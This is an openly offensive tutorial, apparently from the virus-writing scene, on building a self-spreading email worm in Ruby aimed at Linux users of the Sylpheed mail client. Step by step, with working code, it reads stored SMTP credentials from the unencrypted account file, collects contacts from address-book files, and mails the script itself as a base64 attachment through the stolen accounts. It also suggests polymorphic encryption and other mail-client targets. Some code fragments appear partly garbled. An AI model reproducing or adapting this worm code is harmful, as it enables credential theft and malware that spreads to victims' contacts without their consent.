subject : worm spreading-routine : through email target : linux with Sylpheed language : ruby author : sephiroth ( ############### work-flow ################ a.) getting the sylpheed-path b.) getting smtp-account data (user,pwd,server) to send our mails through c.) getting email addresses to send the worm to d.) sending the worm e.) adding a simple polymorph encryption ####################################### ### a.) ### Well like linux is built it is clear, that the userfiles are stored in the home directory. There all Sylpheed versions (2.0-2.4*) own a folder .sylpheed-2.0 . It's always named 2.0 and didn't changed until now. Getting the path to it is quite easy: SYLPATH=ENV["HOME"]+"/.sylpheed-2.0/" We put together the environmental variable "HOME" and the foldername to get the complete path into SYLPATH. ### b.) ### The smtp-account data are saved totally unencrypted in the file 'accountrc' in the .sylpheed-2.0 folder in the home-directory. They are saved with many many additional information we don't wanna care about but we know for sure that all the lines we are interested in begin with 'address=','smtp_server='and 'password='. So let's use the power of rubys regexp to collect these lines and map them into an array. We are gathering all account because if one wouldn't work our worm can simply take the next acc to send hisself through: Account =,:smtp_acc,:pwd) parse_string = /address=(.+?)\n.*?smtp_server=(.+?)\n.*?password=(\w+)/m accounts"#{SYLPATH}accountrc").scan(parse_string).map { |arr|*arr) } Now we can iterate over the accounts array and take our data like: accounts.each do |acc| puts acc.mail_address puts acc.smtp_acc puts acc.pwd end ### c.) ### Getting mail-addresses where we can send our worm to is even easier. We simply read every sylpheed-addressbook file which are located in the same folder as the accountrc file and are named addrbook-*.xml, while * is the number of the addressbook between 000001-999999. But who has so many addressbooks? No matter we take everything which is there: adrbk_entries=[] Dir["#{SYLPATH}addrbook*.xml"].each do |file| { |line| adrbk_entries<<line.sub(/^.+email="/,'').sub(/" remarks.+$/,'') if line =~ /email=/ } end We simply take every addrbook*.xml file in the folder and parse it for the lines which contain a "email=" string which contains of course an email. We clean these lines with regexpr so we just have an email-address at the end and put them all again in an array where we later iterate over. ### d.) ### Imo the hardest part. Spreading the worm. Hard because the ruby standardlib net/smtp contains no abstraction for sending attachments so we have to code it by hand and give care for the mime-formatting. First the code than the explaination: adrbk_entries.each do |emailtosendto| accounts.each do |acc| break if Net::SMTP.start(acc.smtp_acc, 25, 'localhost.localdomain', acc.mail_address,acc.pwd, :login) do |smtp| smtp.open_message_stream(acc.mail_address,emailtosendto.chomp) do |mailfd| mailfd.puts "From: #{acc.mail_address}" mailfd.puts "To: #{emailtosendto.chomp}" mailfd.puts "Subject: #{subject}" mailfd.write("MIME-Version:1.0\r\nContent-Type: multipart/mixed; boundary=\"#{boundary}\"\r\n\r\nThis is a multi-part message in MIME format.\r\n\r\n") mailfd.write("--#{boundary}\r\nContent-Type: text/plain; charset=\"iso-8859-1\"\r\nContent-Transfer-Encoding: 8bit\r\n\r\n#{text}\r\n\r\n--#{boundary}\r\n") mailfd.write("Content-Type: application/octet-stream; name=\"#{attach_name}\"\r\nContent-Transfer-Encoding: base64\r\n") mailfd.write("Content-Disposition: attachment; filename=\"#{attach_name}\"\r\n\r\n#{data}\r\n--#{boundary}--\r\n") end end end end So you see two iterations at the beginning. The first (adrbk_entries.each) gives us everytime an email to send our worm to and the second (accounts.each) gives us smtp account data to try out. If the sending process was successfull we break out of the accounts iteration (break if Net::SMTP.start....) and take the next email to send to. If the sending fails the accounts-iteration gives us new smtp account data to try to send. Well that's pretty simple. But now comes the hard part, the composing of a mime-comform email. The three puts lines should speak for themselves. I'm not going to explain now every part of mime (you can read the rfc yourself) but the things we have to give special attention when coding. We need a boundary, which is any value (the best it's random) to make a cutting line between different sections within an email. The variable is called boundary above and I'm filling it this way: boundary=sprintf("%02X", rand(99999999 - 10000000) + 10000000) + sprintf("%02X", + sprintf("%02X", $$) + sprintf("%02X", The other thing to consider is that an attachment needs to be encoded in base64. This is quite easy with ruby. We open our own code (we use the global-var $0 which always contains the scriptname) and convert it: data = [$0).read()].pack("m*"); You should really not mess up with the four mailfd.write lines except you know what you do because this is the needed and correct mime arrangment. I struggeld with but works no perfectly. In the example above you have to fill a subject and a text variable. Or you add some arrays with these informations and randomly select one. ########### last words ########## This is an example in writing a ruby worm which spreads through email. I took sylpheed as example because: first I use it and like it much and second because I'm not aware of any other worm which (ab)uses it. Of course instead of Sylpheed you could also aim at Thunderbird, Claws(which should be very similar to Sylpheed), Enigmail,... and use it. Next to that you wanna also check SPTHs RUBY Virus Writing Guide ( and add some kind of encryption or even polymorphism to your worm.